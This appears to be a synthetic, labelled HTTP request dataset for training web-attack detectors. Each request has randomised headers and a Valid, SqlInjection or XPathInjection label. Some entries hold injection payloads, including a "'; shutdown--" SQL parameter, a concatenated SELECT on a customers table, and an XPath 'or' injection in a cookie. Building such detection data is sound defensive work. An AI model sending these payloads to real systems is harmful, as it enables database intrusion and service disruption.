Connection: close
Accept: audio/x-wav;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dTeob6e-5o7d624w, gr6ed-to9eisah;q=0.4, gU9la-xnentnm
Cache-Control: min-fresh=5644
Client-ip: 43.137.232.139
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="5"
Date: Sat, 14 Jun 08 07:49:02 CET
ETag: W/"17F1n2q6q2So7mxf"
Expect: 2bjxcs=wsw3;ntaora=E4Oor
From: ebsew@sn8ns6e.de
If-Modified-Since: Wed, 12 Jul 06 02:30:01 UTC
If-Unmodified-Since: Sun, 04 Nov 07 22:26:31 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Dec 06 23:14:20 CET
Max-Forwards: 6
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: NTLM ZWJhOGd0aGtkRWxlYWxyY1R5dnNlczVscGhrdHJoZGtJdGMwQUVhN3I=
Range: -568889,-588214
Referer: http://ctea.de/Sash/ssedtg/asane/itlr.cfm
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: rgx2ksiaeEnrai
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: 8.9 www.sdre.tiff, FTP/5.4 www.6e7ilX4i.jpg
Transfer-Encoding: identity
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 116.157.87.80
X-Serial-Number: 807714416153290560
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42300
Start - Id: 33702
class: Valid
POST /d_mWrEopen_/3PJWe7/miSEN/o3GvaiFo/-KhFW5fm0SH8.asmx? HTTP/1.1
Content-Length: 66
Content-Language: 0lteeiti
Content-Encoding: identity
Content-Location: http://pGLa.gov/itictt/i25lnksi/g7eto/kie8wa/Tho0awe.wmn
Content-MD5: cmJzZ21lZWFkem5VY3NldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Nov 09 17:35:08 UTC
Last-Modified: Sat, 23 Sep 06 16:45:08 UTC
Host: www.i6Erfgl.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, windows-1257;q=0.0, koi8-r, x-mac-chinesesimp;q=0.4, iso-2022-jp
Accept-Encoding: 
Accept-Language: 5dttePir-agisa, enc-zgo;q=0.0, iG-Gdstaiiu;q=0.0
Cache-Control: no-store
Client-ip: 188.178.199.117
Cookie: ohenpudkm=9bgsound3o
Cookie2: $Version="27"
Date: Thu, 09 Dec 04 05:44:40 CET
ETag: W/"OuCB_nSlEjkR3sVs"
Expect: o6Ofdort
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Sat, 26 Sep 09 08:29:04 UTC
If-Unmodified-Since: Fri, 16 Jun 06 17:12:40 GMT
If-Match: "nvtft@raHC-K9ckC-"
If-None-Match: *
If-Range: *
Max-Forwards: 721
MIME-Version: 4.6
Pragma: oahv='iOr'
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM Y2tpZXRvYWJldGZvd3JhdDZwdG9BZDBlYU9sa0hlbmVsd1Rub2Ftam5lQ2F0
Range: -803,-861752
Referer: /tmih.asmx
TE: deflate;q=0.5,trailers
Trailer: Max-Forwards
User-Agent: oonGv/7.4.3
UA-CPU: PowerPC
UA-Disp: 9133,083,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 603x625
Via: elcsna/4.0 113.93.236.137, 1.5 209.13.187.152
Transfer-Encoding: identity
Upgrade: nNNbft/3.3, Asmzu/4.2, arUHa4/8.0
Warning: 369 221.252.105.41 "lswnat" 
X-Forwarded-For: 210.198.222.154
X-Serial-Number: 695598853636
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

afz=8093&3tstdqnol=869419&U2ougZmformTQp=hh+apasswdHIeuogte stiR

End - Id: 33702
Start - Id: 22124
class: Valid
GET /D@i4/tG/aD/ltmtlnsei/1tg5hTzteeLe1tMqndy.sh?eqnAha=ecat%40group+byn+sdtcarG%2Br0cys&iht5biaEasoreTu=7IApntoed4fhNrrn&b_wKJN3Keq=aovdl&_iframescriptgWLallyS=01&eyM66t3a=bOUjz&fR=aeU4jN%24La8w3co%24c&UIu1acnwiawVyr=zn&d869havingCO=htqS&2EDA9jimg=6EO3HD6E64Oy&s2aisayocpiyg8=n HTTP/1.1
Host: www.ldonOc.cz
Connection: sefh
Accept: audio/x-wav;q=0.0, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rlbintHe-E;q=0.2, s7okr-jed;q=0.1, 0gws-lvno;q=0.0
Cache-Control: max-stale=26
Client-ip: 204.187.68.18
Cookie: alhCarebFhne=ixIvJRS3;ebrueasiiz=72
Cookie2: $Version="10"
Date: Thu, 08 Nov 07 01:09:56 GMT
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: zmattjm=t2A2;Raslc=tte9
From: ers7@stiihe.com
If-Modified-Since: Wed, 18 May 05 16:09:23 CET
If-Unmodified-Since: Mon, 29 Mar 10 18:37:40 GMT
If-Match: *
If-None-Match: "YYHnrLuic6Ng0Vh"
If-Range: "PcFVYs_cVMa5fDPK"
Max-Forwards: 2307
MIME-Version: 1.6
Pragma: spL='teteep'
Proxy-Authorization: iad9E rrbbtd=umT68
Authorization: Basic cnJ6d2U6bzN1bG40
Range: 1976-
Referer: http://vNihdr.biz/5tjnfRe/e1ve/ohit/neb8s0bE.zip
TE: trailers,gzip,deflate
Trailer: Range
User-Agent: Mozilla/0.9 (X11; U; Linux i586 1.9; ti-vf; rv:8.7.3) Gecko/74785868
UA-CPU: StrongARM
UA-Disp: 2956,8446,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 221x4182
Via: iH9/1.6 86.181.32.173, 7Fhs/2.1 www.sishr.css, 7.1 4.183.49.46:30295
Transfer-Encoding: compress
Upgrade: ereinf/3.5, eEt0/2.9, zrTT/7.8, hta/4.0
Warning: 827 195.166.47.193:1 "Ioantgeer1tmsd5ne" 
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 758582186109644
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22124
Start - Id: 19846
class: Valid
GET /d2nIC0Wc/t@P@NZrgg.iehwQ.css?ete=2410&G2s6kpF=sL34a7f&dnoOH=obupdatet&leeqaastrElvks=tyslDte0script&hcno=eNIu&aeuneeelsndl=eat&fAspuT9eHsnaeY=hTlpasswd&7gTholc00tmnue=8eval&raidmsix=690437&g6c5fpwB=ofciyJIO&41uStmpHi.@5=%28e&a5lGcoei=deoN%26d%5C-p5rY5&KS.WvbscriptP=ntepeexoehieh%3Aj1&liol=ner7o&HONbG=xtYpur HTTP/1.1
Host: 245.83.210.18
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.5, macintosh;q=0.6, iso-8859-5, windows-874
Accept-Encoding: identity;q=0.2, identity;q=0.8, identity;q=0.1, compress;q=0.2
Accept-Language: *;q=0.5
Cache-Control: max-age=04769
Client-ip: 18.141.33.165
Cookie: kng9neihiar=695867;htaau6go42e=s0sBHI;mresaoD=binO6\pg5s;54ld=ginFIln( iot:usriframeye
Cookie2: $Version="71"
Date: Sun, 12 Jul 09 19:10:47 GMT
ETag: W/"nc6mS9yFNj6sNjxF1c"
Expect: 100-continue
From: gu7i51@tt3gils.biz
If-Modified-Since: Sat, 07 Aug 04 09:17:23 GMT
If-Unmodified-Since: Mon, 17 Nov 08 16:38:20 UTC
If-Match: "AuoU3yG@JtCE4dBCnHdc"
If-None-Match: "BuJQPFa0Pu90wQDc4d"
If-Range: Sun, 23 Dec 07 03:17:44 UTC
Max-Forwards: 36
MIME-Version: 2.8
Pragma: SH=db
Proxy-Authorization: NTLM Y0dvbnp0c2xhZXdyaDl0empuOXJvUjRtdGVpbk9seXJ6aXI=
Authorization: vlhlc fsgh0=mOUmdh
Range: 31-27672,31-,92-
Referer: /w3hdHmo.shtml
TE: chunked;q=0.4,deflate
Trailer: Accept-Encoding
User-Agent: o3-dxFeX http://www.tu6ioab.it
UA-CPU: StrongARM
UA-Disp: 9849,2633,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: 9.3 117.90.230.52, 7.1 237.116.208.170, HTTP/9.3 234.51.99.251
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19846
Start - Id: 35140
class: SqlInjection
PUT /e35bmQzRW/dhaEatNk/7Rjmtvwh5QuYM/drYf3drBOSaJw.html? HTTP/1.1
Content-Length: 328
Content-Language: ia6
Content-Encoding: identity
Content-Location: /ppte7aN/easdn/ensni/eshfmh.html
Content-MD5: MnVvZWVvYW5FZWExOGRhcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 09:06:50 UTC
Last-Modified: Sun, 21 Mar 10 08:51:33 CET
Host: 244.223.40.35
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: mkodaGh-rjdie;q=0.0, qtdr8xtr-me;q=0.6, mzso-N6, i-tO;q=0.6
Cache-Control: min-fresh=5583
Client-ip: 104.27.173.11
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="87"
Date: Mon, 16 Feb 09 07:03:54 UTC
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Fri, 16 Jan 09 20:31:42 GMT
If-Unmodified-Since: Mon, 12 Dec 05 09:48:43 UTC
If-Match: "fbrkAD_A5ucqvcDj@"
If-None-Match: "xAeDUQ3e7hTvFHvOCvd"
If-Range: Tue, 22 Jun 04 10:44:19 UTC
Max-Forwards: 32
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM c2U1VW96MGxhbmloYmppbjhsdHNhc2hucXhhdDNyZ28=
Range: 63-383,700-,-5
Referer: /1aLr3/eEtrim5/jtr3.php3
TE: trailers,deflate
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 6.3; er-tu; rv:7.2.9) Gecko/04756739
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 8.8 224.44.123.243:71, FTP/8.7 www.1eneSh.tiff:23054, HTTP/0.3 55.31.51.74
Transfer-Encoding: identity
Upgrade: pt5etn/1.8, Epd/4.6, nuba/1.0, kixdml/0.4, fecwi/7.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naucfpaanyt9a=m~v o&ts97coeA1yntwt=admin&wznNier=soiarwLsibcmdRtoE&nSr8=rhf ztsa34'xmlm%&ppr=7%yya&cra=e@KZuAdpG&fls=5edTe&odtgps&daktcdaoouNta='select    customer_phone    '||'from  customers  '||'where customer_surname='''||    lv_surname||''' and    customer_type=1';

End - Id: 35140
Start - Id: 19930
class: Valid
GET /tFR_OAY@G1/eo/eFnsBXH1N/T3Icorp5s/winntGInG/dS-4fFmrUFYf/neanttEbwb1qrqiwt/enont/nnsovetqgahldo5hnNm/lRAfcOEFltt9Tmvg5MMH/4RwjuoS5LiaRoZc.cfm?t65rrai8rnim=3822253058&8edlHeei=nT3ewplfC&mtT7=psDcWzKWIQ&ygk54I=m4h&rhtiiybinpeuden=78712&zhtpassA0dxvS1w=cBL&tmpE_w=c&tyFI=14393&nadbaer=35807 HTTP/1.0
Host: 10.102.70.101
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.9, euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: a4n=nciktbse
Client-ip: 52.13.82.146
Cookie: i6=grsmcied;lewe=qwinnt;ooxi5=esbhqqe<b;raemceeI7Ee=m
Cookie2: $Version="3"
Date: Mon, 02 Jul 07 04:48:26 CET
ETag: W/"ile_Zdc_ZUvNFN1"
Expect: 100-continue
From: eeruearo@0jdeseld5.de
If-Modified-Since: Sat, 20 Feb 10 19:52:16 UTC
If-Unmodified-Since: Thu, 18 Jan 07 12:06:13 GMT
If-Match: *
If-None-Match: *
If-Range: "dclwE-NpS.iv7w0MfQUw"
Max-Forwards: 10
MIME-Version: 9.9
Pragma: eEr5rtaL='he64n'
Proxy-Authorization: Digest cnonce="ocnn"
Authorization: Basic dGFvYzppbGd0
Range: -938127,36370-,-5
Referer: http://7dc3h.cz/guah/6ollIip/eneehi/tLems6.tiff
TE: trailers,deflate,deflate
Trailer: Max-Forwards
User-Agent: iOhkoSZd http://www.cmuyemi.ch
UA-CPU: x86
UA-Disp: 611,1277,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 756x2638
Via: tfode0/3.4 153.36.41.210, 1.0 130.150.130.58
Transfer-Encoding: deflate
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19930
Start - Id: 41991
class: SqlInjection
GET /s2IcbyhTH4Qdg6NVrl/4mnT1/DWkBpsWphp8IZ8lib/ikhm/8axogqe/z-iLfwPg/dixaephxIr.sh?eDest5v=rA8%40%408c&eaenrmnnJa=t&liq2qftbanuelyo=Soooe8ese8er&ety=aw7P10IPqy&eaekmvfh6D=ci7Lea1lnoCo&uan1nhr=havingEz&M.Kd2=+le&fTcdiowWll=4627911083&lhnpnin1orecj=3380&s21tNEoST6ohTn=%27%3B+++++shutdown--&ai4hnacr2=tstyleenaevalpinDs&hPNexecYftpk13v=6&Nens1uAja=eoga9ppnVo&tetg=489590889&sinnc8bses=voprisareOa9aE HTTP/1.0
Host: www.7etaneoY.cz
Connection: close
Accept: image/gif;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.2, identity, gzip
Accept-Language: tCcaei-trumrer;q=0.9
Cache-Control: min-fresh=77449
Client-ip: 165.230.81.35
Cookie: hcg=5375748072
Cookie2: $Version="419"
Date: Tue, 31 Jul 07 12:49:55 CET
ETag: "@kad9QMXdlP@jeeYm73"
Expect: taus=aiyn
From: wXro@erouh.com
If-Modified-Since: Sat, 07 Jun 08 22:17:37 GMT
If-Unmodified-Since: Tue, 09 Oct 07 04:21:18 UTC
If-Match: *
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: "@3kiotqHU5azj7HoXS"
Max-Forwards: 8
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: moodt M1ooTnr=oletai
Range: -728027,84041-8,736156-
Referer: http://sleeloi.be/depth/aNaa/cwip/stmtld.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.1 (Windows; U; WinNT 0.9; 7e-mX; rv:8.6.1) Gecko/99641679
UA-CPU: x86
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4309x0685
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: identity
Upgrade: tsem/9.8, icrMn/2.4
Warning: 419 www.soi3j.shtml "Rfio" "Fri, 25 Nov 05 06:34:30 GMT"
X-Forwarded-For: 23.57.98.8
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41991
Start - Id: 28056
class: Valid
GET /metamOWdnBcb.asmx?naAe=a&RPbZIobjectJoaz=njahef&theioCoarq=4sle1eNs4&sam@G5=aecqrywinnteheet&dtseh=Kbongz%5Ce3u%5B6n&lbf=ns%3Bo&e7eewdy=jg%40&zo-lgCL=7&it=ymc6kDWtpd&9havinggrP@=ytLbodya6tadol&xisfe0=078842&1eebma=on5tsas1e&8ihhseaere=435&Lstdinps12z=5306 HTTP/1.1
Host: 42.203.0.58
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, deflate;q=0.1
Accept-Language: 4njdo-0o86St, a6Hsomw-2Deteoa;q=0.2, m13ed-bid4s, Len7aiqe-apers;q=0.4
Cache-Control: Iswx=s7m
Client-ip: 106.176.170.46
Cookie: 9processing-instructionDaSB1Fg=jnullboot.ini]doa$;qOord1kOK3=~e
Cookie2: $Version="63"
Date: Sat, 26 Jul 08 09:30:36 GMT
ETag: W/"8jQIu9B@UcxUE_Ne"
Expect: ansis
From: gu9cDaia@ar6it9.st
If-Modified-Since: Wed, 27 Aug 08 14:54:28 GMT
If-Unmodified-Since: Fri, 07 Dec 07 04:10:50 UTC
If-Match: "FPe@1z88xmfpA0Npg4"
If-None-Match: *
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 0122
MIME-Version: 3.4
Pragma: xstbfeea='Gu'
Proxy-Authorization: Basic dW5uYzp6b2NhRFRl
Authorization: Digest algorithm=MD5-sess
Range: -570
Referer: http://Ler8Au.cz/sedn4gul/neon0usi/jhn7u/rohyru/5cecmu.tiff
TE: chunked;q=0.4
Trailer: Host
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 7.8; Ae-QT; rv:3.0.9) Gecko/17432354
UA-CPU: MIPS
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2111x3686
Via: h6nia/2.6 240.94.82.193, HTTP/9.7 www.dwgn7ze9.tiff:78, a1ich9/6.6 www.spE6.jpeg
Transfer-Encoding: identity
Upgrade: mt50n/6.1, frlaru/6.7
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28056
Start - Id: 35496
class: XPathInjection
GET /pTloits3o80p3pvd/oavbioen4b376tnt3abr/iLjjgh9V0QApwSJ/exQUf5CbN-@z94.htm? HTTP/1.0
Host: 53.221.120.96:5388
Connection: close
Accept: application/*, video/quicktime;q=0.2, video/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, deflate;q=0.9, compress;q=0.5
Accept-Language: lnEnceho-lEliS;q=0.9, gc-Hehn
Cache-Control: no-cache
Client-ip: 209.250.192.160
Cookie: 7liRbhl7cIeli7=d s2o~;heresuetr8eTist=886912;Bautoexecq3jm95openWk=mi>Ar'aboX;a9K8E60uisd=ahgni5pwqer;tdmnecDS=eMrgGZ/fh/3ee/child::node()[ position()=78]  |  t/Eay/erf06d/child::text()[position()=09]     or  'geRe' = ';BARbselectX0vY=aly|w3aw
Cookie2: $Version="3"
Date: Thu, 12 Feb 09 01:45:20 UTC
ETag: W/"0zK74k1kNw4O5vq9F"
Expect: n3serr=yceoeeS;qmTsss=deunoaTt
From: a8rg@iaaSadh.uk
If-Modified-Since: Sun, 29 Oct 06 02:20:36 CET
If-Unmodified-Since: Fri, 06 Aug 04 01:38:21 CET
If-Match: *
If-None-Match: "5jXcpzmd-3hQu6r_"
If-Range: Sun, 01 May 05 24:36:34 GMT
Max-Forwards: 067
MIME-Version: 8.9
Pragma: eaenr2g=ulsaI
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: N373pa nrenh=iswsnx
Range: 2-37781,-037,39-
Referer: http://inrhg.it/E5fttt/olz6egA.nsf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 3.7; 17-8r; rv:4.1.0) Gecko/70430057
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x662
Via: HTTP/2.5 www.1omv.js, 9.1 www.aro1rl.jpeg:3085, HTTP/8.1 9.57.110.38
Transfer-Encoding: ebr76; ut51g=htlohZ4
Upgrade: iio/8.3, nnpE/7.4
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35496
Start - Id: 32535
class: Valid
GET /atn3ihun/dC.cfm? HTTP/1.0
Host: 14.145.17.87
Connection: ohdiyanc
Accept: image/*;q=0.8, text/plain, text/*;q=0.2
Accept-Charset: x-mac-roman;q=0.0, x-mac-chinesesimp, windows-1257, iso-8859-7, iso-8859-3
Accept-Encoding: identity;q=0.1, deflate, deflate;q=0.6, deflate, identity;q=0.9
Accept-Language: sth9T-1sspJSr, pe-tcphylYc;q=0.6, eaq-hreptv, cazMjsha-egN4alo, fodr6dit-eillis;q=0.8
Cache-Control: max-stale=16682
Client-ip: 184.164.108.61
Cookie: bei2qahdi=djloottcs1teh4s;sinh=29672;nera9vtDsg=oY;cueitir=740047
Cookie2: $Version="107"
Date: Fri, 05 Nov 04 04:58:05 GMT
ETag: W/"rmorhLHJUwNUmEVqx"
Expect: ghst47t
From: so2rd@tls7s.biz
If-Modified-Since: Sat, 28 Aug 04 13:47:25 GMT
If-Unmodified-Since: Sat, 18 Mar 06 07:31:30 UTC
If-Match: "qDolZ7PjF2C6Rn9"
If-None-Match: *
If-Range: "U6VD3PQo5v@.g72E7DqS"
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ni59"
Authorization: Basic dHllczVvbjQ6c3BQZnRvNmg=
Range: 49335-07309,-330564
Referer: http://www.wtgo.gov/ssidtT/xobt.gz
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.6 (compatible; Konqueror/3.3; WinNT; belOost; iNTeiy)
UA-CPU: PowerPC
UA-Disp: 7495,590,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5706x229
Via: 6.9 180.10.164.140:28571
Transfer-Encoding: compress
Upgrade: ajrIgd/6.3, orleV/5.0
Warning: 528 www.betad0.html "lHtbiiiua7s" 
X-Forwarded-For: 6.125.126.191
X-Serial-Number: 2741094376928409
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32535
Start - Id: 6699
class: Valid
POST /DZV0YK7xclnC/LnramaOyydwesicibato/oqpmeta7uD7hoF/Txjdem4cyrtcloyzT/ulplfhcYGJ1H/hTEa/tpSkrHf4pqrGExn/uucs-J-HZcUaPo_bnTtc.js? HTTP/1.1
Content-Length: 235
Content-Language: ChIa,n
Content-Encoding: gzip
Content-Location: http://fqag3p.ch/1d07esH/oesih/eihw/r3l9brn/sysei.mpg
Content-MD5: bWdhaWlub2hvZWV6b29SZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Apr 04 04:43:43 UTC
Last-Modified: Fri, 26 May 06 03:25:45 UTC
Host: 255.120.141.83:9690
Connection: tutd
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: ePirtal-suck;q=0.5, te-w4g4Mamm;q=0.0, tId3t-ulgd8e, IetiswrO-rt
Cache-Control: no-transform
Client-ip: 165.169.21.177
Cookie: eeau=4;zOtWpNxBg=qalto8tvr9s;taAnixg=97678;jeuzaer=9IJ3ROQCvfP;5hnb1rm=9;obnst6rezm=yImuAb
Cookie2: $Version="91"
Date: Mon, 25 May 09 06:24:22 GMT
ETag: "aUAEYweAIy_FKSmYU"
Expect: odtyie
From: knj5rt@a7eaent9k.cz
If-Modified-Since: Sun, 15 Aug 04 07:53:00 GMT
If-Unmodified-Since: Fri, 04 Nov 05 08:01:20 CET
If-Match: *
If-None-Match: *
If-Range: "OitpHwfjeZ-G76ot"
Max-Forwards: 8434
MIME-Version: 7.3
Pragma: aoarR='9oaiwd'
Proxy-Authorization: dsaeS r0s5=eu7h
Authorization: NTLM aGF0U3B1YW1ybjdtZUlsbmhrSGRyZWZvcnB0b1N5bWJ1OGls
Range: -5629,33-
Referer: /4my1ibr/r7etemlz/Eyssnw/aitont.pl
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 0.2; yh-sc; rv:4.5.4) Gecko/04913553
UA-CPU: Sparc
UA-Disp: 2132,825,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 075x397
Via: 2.6 www.raUdML6a.png, HTTP/0.0 www.dto7tnR.png:518, FTP/7.5 18.174.206.56
Transfer-Encoding: gzip
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 827 www.Hnnarn.gif "6iaoe" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

disaFTOoxu=iVgDBm5_5xF&0J@Z=805&sqoectfmcvhs=y qihiaho<73:0&sasbesnzyloe=068313&MNzgWRwqlb=90&Esanidahetelyey=ieiwSnph-nesk2ez9nrooid&replaceMSs9Fi9q=5&eEi0meEtxewtd=nojnz'euth&tiIalmsle1rrtj=lOqthea&9c=tvnulleit&t8jbsaodu=kAnKIG

End - Id: 6699
Start - Id: 25621
class: Valid
GET /gjRhYivS1yoY5NskUuvA/3Ma9Bnkkmgec3oADlI/oct/zTfX@1abtsfNMqPn_8t./eHhDV/eCiyGQ/qxmdhhxtdnA/sXBHkmeA.L..0E/nrjagrgmnif7hv.js?Aweur=elwk3&undO=ig5%29jOcre&O1f1saehrtts=sEomtoetr&roqahp=say&mnsc0ud=9417&aUf=45667 HTTP/1.0
Host: www.s0n7mep.de:2434
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.2, iso-8859-8, windows-1251;q=0.4, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: nmldd-rhtr7;q=0.5, heger-5dH8ord;q=0.3, ict-ttO0e;q=0.8
Cache-Control: min-fresh=03
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Thu, 03 May 07 17:53:01 UTC
ETag: "40qbs8cJE5VsXz7fNPK"
Expect: 100-continue
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Sat, 10 Apr 04 07:58:42 UTC
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: *
If-None-Match: *
If-Range: "Yj-RCZJ1hwZv.hmFlLn"
Max-Forwards: 8
MIME-Version: 6.8
Pragma: 3ojeg=kq2sat
Proxy-Authorization: Digest nonce
Authorization: NTLM ZWVyZm5saWVoaW9qb2FpZWhTbnNwcHlaaGROcnJ0ZXFvbXRubkVsenRNcXNlcw==
Range: -1684
Referer: /ladotaih/fotnt4U/aoSmt2/e3uEot/pepgs.mpg
TE: gzip;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 3.4; Fp-ke; rv:4.3.8) Gecko/68964307
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0216x076
Via: oha5v/4.2 105.22.67.60, y4o3T/9.2 www.deol.jpeg
Transfer-Encoding: deflate
Upgrade: j2sy/1.0, eHioTt/6.1, ellr/5.1, dd6/7.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 400505966006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25621
Start - Id: 34623
class: Valid
PUT /lbFeeZBHJXb8f.1rhn/i9kD7SFVMu/iOrhtre7vwibmgaa6sKw/nc/veLnnykndeu/E8/niyaraam4lix/cnhsqM5rxqiaeghro.pl? HTTP/1.1
Content-Length: 171
Content-Language: qaSlta3,vhe8,i8rr6mel
Content-Encoding: identity
Content-Location: /0trnal/rNjudea/rc9u.gif
Content-MD5: cHdoaWEyb2JsZGVzb3Q1YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Apr 08 18:43:39 UTC
Last-Modified: Thu, 14 May 09 20:45:39 UTC
Host: 42.94.90.5:80
Connection: edle
Accept: image/*;q=0.8, video/quicktime
Accept-Charset: x-mac-turkish;q=0.5, euc-cn;q=0.5, windows-1253
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=4
Client-ip: 101.169.56.229
Cookie: ea=uaecsfot;oohhlnsac=gIhinsert> aSiyx5a%;ehdo3oetaRoo=eqBLi;ig2QLH-divvK=9;q7c3msnoDe4hn=p esaa&4
Cookie2: $Version="89"
Date: Fri, 01 Aug 08 12:35:43 GMT
ETag: W/"5vA1LW_oI0TmfQ2jWCH"
Expect: 100-continue
From: o2iTn@deiqcrI.net
If-Modified-Since: Fri, 24 Oct 08 19:10:28 UTC
If-Unmodified-Since: Sun, 20 May 07 01:09:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0407
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest nc=f8247d8B
Authorization: Digest response="0A4FbC0CF9f60dd5bfBDddb1ae90E8ce"
Range: -64
Referer: http://eedunlli.de/sat1ox/ha1s1o/d7ecgs5/wmtNu.mspx
